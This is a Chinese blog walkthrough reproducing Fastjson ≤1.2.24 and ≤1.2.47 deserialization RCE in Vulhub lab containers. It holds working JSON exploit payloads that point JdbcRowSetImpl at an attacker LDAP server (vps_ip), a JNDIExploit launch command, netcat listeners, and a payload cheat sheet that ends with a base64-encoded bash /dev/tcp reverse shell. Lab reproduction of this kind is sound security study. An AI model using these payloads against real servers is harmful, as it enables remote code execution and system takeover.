Fastjson反序列化漏洞

本文最后更新于 2024年8月26日 下午

简介

Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。

Github地址:https://github.com/vulhub/vulhub

1
2
3
4
5
6
# 下载项目
git clone https://github.com/vulhub/vulhub.git  
# 进入靶场目录
cd vulhub/xxx
# 启动靶场
docker-compose up

fastjson ≤ 1.2.24 反序列化漏洞

漏洞环境

靶场ip:192.168.199.132

1
2
cd /vulhub/fastjson/1.2.24-rce
docker-compose up

访问地址: http://192.168.199.132:8090/,即可看到 JSON 格式的输出。

漏洞复现

使用Jndi漏洞利用工具,在公网服务器开启ldap服务,监听11389端口

1
2
# 开启ldap服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps_ip -l 11389 -p 18080

命令执行

1
2
3
4
5
6
7
8
9
10
# 命令执行回显,在请求头中添加cmd字段和要执行的命令
cmd:whoami

{
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://vps_ip:11389/Basic/TomcatEcho",
    "autoCommit":true
  }
}

反弹shell

1
2
3
4
5
6
7
8
9
10
# 反弹shell
nc -lvp 18888

{
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://vps_ip:11389/Basic/ReverseShell/vps_ip/18888",
    "autoCommit":true
  }
}

fastjson ≤ 1.2.47 反序列化漏洞

漏洞环境

靶场ip:192.168.199.132

1
2
cd /vulhub/fastjson/1.2.47-rce
docker-compose up

访问地址:http://192.168.199.132:8090/,即可看到 JSON 格式的输出。

漏洞复现

使用Jndi漏洞利用工具,在公网服务器开启ldap服务,监听11389端口

1
2
# 开启ldap服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps_ip -l 11389 -p 18080

命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 命令执行回显,在请求头中添加cmd字段和要执行的命令
cmd:whoami

{
  "a":{
    "@type":"java.lang.Class",
    "val":"com.sun.rowset.JdbcRowSetImpl"
  },
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://vps_ip:11389/Basic/TomcatEcho",
    "autoCommit":true
  }
}

反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 反弹shell
nc -lvp 18888

{
  "a":{
    "@type":"java.lang.Class",
    "val":"com.sun.rowset.JdbcRowSetImpl"
  },
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://vps_ip:11389/Basic/ReverseShell/vps_ip/18888",
    "autoCommit":true
  }
}

LDAP命令大全

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 命令执行回显,在请求头中添加cmd字段和要执行的命令
cmd:whoami
ldap://vps_ip:1389/Basic/TomcatEcho
ldap://vps_ip:1389/Basic/SpringEcho
ldap://vps_ip:1389/Basic/WeblogicEcho
ldap://vps_ip:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://vps_ip:1389/Deserialization/C3P0/SpringEcho
ldap://vps_ip:1389/Deserialization/Jdk7u21/WeblogicEcho
ldap://vps_ip:1389/TomcatBypass/TomcatEcho
ldap://vps_ip:1389/TomcatBypass/SpringEcho

# 反弹shell
nc -lvp 8888
ldap://vps_ip:1389/Basic/ReverseShell/vps_ip/8888
# Base64编码后的‘+’使用url编码‘%2b’替换(bash -i >& /dev/tcp/vps_ip/8888 0>&1)
ldap://vps_ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%2bJiAvNGV2L3RjcC8xMjEuCC42OS4yNC84ODg4IDA%2bJjE=